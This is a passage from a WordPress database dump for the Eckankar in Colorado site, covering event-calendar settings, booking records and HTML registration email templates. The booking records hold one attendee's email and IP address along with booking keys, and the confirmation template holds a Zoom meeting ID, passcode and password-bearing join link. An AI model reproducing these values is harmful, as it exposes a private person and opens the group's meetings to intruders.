/>\r\n%%blog_name%%</p>\";}}'),(175308,267700,'passster_activate_global_protection',NULL),(175309,267700,'passster_activate_protection',NULL),(175310,267700,'passster_protection_type','password'),(175314,267700,'_dp_original','267698'),(175312,267700,'boldgrid_in_page_containers','1'),(175313,267700,'_thumbnail_id','266397'),(175315,267700,'_edit_lock','1673761183:15'),(175316,267700,'_edit_last','15'),(175317,267701,'protect_children',''),(175318,267701,'mec_color',''),(175319,267701,'mec_location_id','118'),(175320,267701,'mec_dont_show_map','0'),(175321,267701,'mec_organizer_id','1'),(175322,267701,'mec_read_more',''),(175323,267701,'mec_more_info',''),(175324,267701,'mec_more_info_title',''),(175325,267701,'mec_more_info_target','_self'),(175326,267701,'mec_cost',''),(175327,267701,'mec_currency','a:0:{}'),(175328,267701,'mec_additional_organizer_ids','a:0:{}'),(175329,267701,'mec_additional_location_ids','a:0:{}'),(175330,267701,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-23\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-23\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175331,267701,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175332,267701,'mec_certain_weekdays','a:0:{}'),(175333,267701,'mec_allday','0'),(175334,267701,'one_occurrence','0'),(175335,267701,'mec_hide_time','0'),(175336,267701,'mec_hide_end_time','0'),(175337,267701,'mec_comment',''),(175338,267701,'mec_timezone','global'),(175339,267701,'mec_countdown_method','global'),(175340,267701,'mec_public','1'),(175341,267701,'mec_start_date','2023-02-23'),(175342,267701,'mec_start_time_hour','2'),(175343,267701,'mec_start_time_minutes','0'),(175344,267701,'mec_start_time_ampm','PM'),(175345,267701,'mec_start_day_seconds','50400'),(175346,267701,'mec_end_date','2023-02-23'),(175347,267701,'mec_end_time_hour','3'),(175348,267701,'mec_end_time_minutes','0'),(175349,267701,'mec_end_time_ampm','PM'),(175350,267701,'mec_end_day_seconds','54000'),(175351,267701,'mec_repeat_status','0'),(175352,267701,'mec_repeat_type',''),(175353,267701,'mec_repeat_interval','1'),(175354,267701,'mec_repeat_end',''),(175355,267701,'mec_repeat_end_at_occurrences',''),(175356,267701,'mec_repeat_end_at_date',''),(175357,267701,'mec_advanced_days','a:0:{}'),(175358,267701,'mec_in_days',''),(175359,267701,'mec_not_in_days',''),(175360,267701,'mec_hourly_schedules','a:0:{}'),(175361,267701,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175362,267701,'mec_tickets','a:0:{}'),(175363,267701,'mec_fees_global_inheritance','1'),(175364,267701,'mec_fees','a:0:{}'),(175365,267701,'mec_ticket_variations_global_inheritance','1'),(175366,267701,'mec_ticket_variations','a:0:{}'),(175367,267701,'mec_reg_fields_global_inheritance','1'),(175368,267701,'mec_reg_fields','a:0:{}'),(175369,267701,'mec_bfixed_fields','a:0:{}'),(175370,267701,'mec_op','a:0:{}'),(175371,267701,'mec_fields','a:0:{}'),(175372,267701,'mec_event_status','EventScheduled'),(175373,267701,'mec_moved_online_link',''),(175374,267701,'mec_cancelled_reason',''),(175375,267701,'mec_display_cancellation_reason_in_single_page',''),(175376,267701,'boldgrid_hide_page_title','0'),(175377,267701,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(175378,267701,'passster_activate_global_protection',NULL),(175379,267701,'passster_activate_protection',NULL),(175380,267701,'passster_protection_type','password'),(175381,267701,'boldgrid_in_page_containers','1'),(175382,267701,'_thumbnail_id','266716'),(175384,267701,'_dp_original','267700'),(175385,267701,'_edit_lock','1673761581:15'),(175386,267701,'_edit_last','15'),(175387,267702,'mec_transaction_id','BND81763'),(175388,267702,'mec_user_id','1000064'),(175389,267702,'mec_verified','1'),(175390,267702,'mec_verification_key','141628b903a57e15d47ca4d6ce147226'),(175391,267702,'mec_cancellation_key','079836761e42271e48059aa9640d26ff'),(175392,267702,'mec_confirmed','1'),(175393,267702,'mec_event_id','267433'),(175394,267702,'mec_date','1674387900:1674392400'),(175395,267702,'mec_ticket_id',',1,'),(175396,267702,'mec_booking_time','2023-01-14 23:46:33'),(175397,267702,'mec_all_dates','a:0:{}'),(175398,267702,'mec_other_dates','a:0:{}'),(175399,267702,'mec_attention_time','1674387900:1674392400'),(175400,267702,'mec_attention_time_start','1674387900'),(175401,267702,'mec_attention_time_end','1674392400'),(175402,267702,'mec_book_date_submit','20230114234633'),(175403,267702,'mec_booking_location','129'),(175404,267702,'mec_ticket_price_1','0'),(175405,267702,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.23.67.24\";}}'),(175406,267702,'mec_price','0'),(175407,267702,'mec_gateway','MEC_gateway_free'),(175408,267702,'mec_gateway_label','Free'),(175409,267703,'mec_transaction_id','EPV44453'),(175410,267703,'mec_user_id','1000064'),(175411,267703,'mec_verified','1'),(175412,267703,'mec_verification_key','4457186fdbec7c941c810e342c8fc1a7'),(175413,267703,'mec_cancellation_key','93a7b5f3f7f355e3839fff5b8ec7eecb'),(175414,267703,'mec_confirmed','1'),(175415,267703,'mec_event_id','267570'),(175416,267703,'mec_date','1674383400:1674387000'),(175417,267703,'mec_ticket_id',',1,'),(175418,267703,'mec_booking_time','2023-01-14 23:48:26'),(175419,267703,'mec_all_dates','a:0:{}'),(175420,267703,'mec_other_dates','a:0:{}'),(175421,267703,'mec_attention_time','1674383400:1674387000'),(175422,267703,'mec_attention_time_start','1674383400'),(175423,267703,'mec_attention_time_end','1674387000'),(175424,267703,'mec_book_date_submit','20230114234826'),(175425,267703,'mec_booking_location','118'),(175426,267703,'mec_ticket_price_1','0'),(175427,267703,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.23.67.24\";}}'),(175428,267703,'mec_price','0'),(175429,267703,'mec_gateway','MEC_gateway_free'),(175430,267703,'mec_gateway_label','Free'),(175800,267746,'_field_133','Test'),(175431,267478,'_wp_old_date','2023-01-13'),(177408,268015,'original-file','2023/02/outlook-online-4-for-adding-domain-updraft-pre-smush-original.png'),(177409,268015,'smush-complete','1'),(177410,268015,'smush-info','The file was compressed from 42.99 KB to 21.70 KB saving 49.52 percent using WP-Optimize'),(177411,268015,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:44023;s:12:\"smushed-size\";i:22223;s:15:\"savings-percent\";d:49.52;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:44023;s:10:\"compressed\";i:22223;}s:6:\"medium\";a:2:{s:8:\"original\";i:9465;s:10:\"compressed\";i:5127;}s:5:\"large\";a:2:{s:8:\"original\";i:58588;s:10:\"compressed\";i:23281;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5163;s:10:\"compressed\";i:3118;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:39476;s:10:\"compressed\";i:16069;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14908;s:10:\"compressed\";i:6872;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:25314;s:10:\"compressed\";i:10977;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:18825;s:10:\"compressed\";i:8451;}s:8:\"tileview\";a:2:{s:8:\"original\";i:21170;s:10:\"compressed\";i:9414;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:96846;s:10:\"compressed\";i:38408;}}}'),(177378,268006,'_wp_attachment_context','site-icon'),(177379,268006,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:30:\"2023/02/cropped-favicon-g3.png\";s:8:\"filesize\";i:91272;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19726;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48236;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66950;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50400;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55400;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41816;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27026;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:30:\"cropped-favicon-g3-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24806;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:28:\"cropped-favicon-g3-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2676;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177377,268006,'_wp_attached_file','2023/02/cropped-favicon-g3.png'),(175505,267730,'mec_color',''),(175506,267730,'mec_location_id','129'),(175507,267730,'mec_dont_show_map','0'),(175508,267730,'mec_organizer_id','1'),(175509,267730,'mec_read_more',''),(175510,267730,'mec_more_info',''),(175511,267730,'mec_more_info_title',''),(175512,267730,'mec_more_info_target','_self'),(175513,267730,'mec_cost',''),(175514,267730,'mec_currency','a:0:{}'),(175515,267730,'mec_additional_organizer_ids','a:0:{}'),(175516,267730,'mec_additional_location_ids','a:0:{}'),(175517,267730,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(175518,267730,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(175519,267730,'mec_certain_weekdays','a:0:{}'),(175520,267730,'mec_allday','0'),(175521,267730,'one_occurrence','0'),(175522,267730,'mec_hide_time','0'),(175523,267730,'mec_hide_end_time','0'),(175524,267730,'mec_comment',''),(175525,267730,'mec_timezone','global'),(175526,267730,'mec_countdown_method','global'),(175527,267730,'mec_public','1'),(175528,267730,'mec_start_date','2023-02-12'),(175529,267730,'mec_start_time_hour','10'),(175530,267730,'mec_start_time_minutes','30'),(175531,267730,'mec_start_time_ampm','AM'),(175532,267730,'mec_start_day_seconds','37800'),(175533,267730,'mec_end_date','2023-02-12'),(175534,267730,'mec_end_time_hour','11'),(175535,267730,'mec_end_time_minutes','30'),(175536,267730,'mec_end_time_ampm','PM'),(175537,267730,'mec_end_day_seconds','84600'),(175538,267730,'mec_repeat_status','0'),(175539,267730,'mec_repeat_type',''),(175540,267730,'mec_repeat_interval','1'),(175541,267730,'mec_repeat_end',''),(175542,267730,'mec_repeat_end_at_occurrences',''),(175543,267730,'mec_repeat_end_at_date',''),(175544,267730,'mec_advanced_days','a:0:{}'),(175545,267730,'mec_in_days',''),(175546,267730,'mec_not_in_days',''),(175547,267730,'mec_hourly_schedules','a:0:{}'),(175548,267730,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(175549,267730,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(175550,267730,'mec_fees_global_inheritance','1'),(175551,267730,'mec_fees','a:0:{}'),(175552,267730,'mec_ticket_variations_global_inheritance','1'),(175553,267730,'mec_ticket_variations','a:0:{}'),(175554,267730,'mec_reg_fields_global_inheritance','1'),(175555,267730,'mec_reg_fields','a:0:{}'),(175556,267730,'mec_bfixed_fields','a:0:{}'),(175557,267730,'mec_op','a:0:{}'),(175558,267730,'mec_fields','a:0:{}'),(175559,267730,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 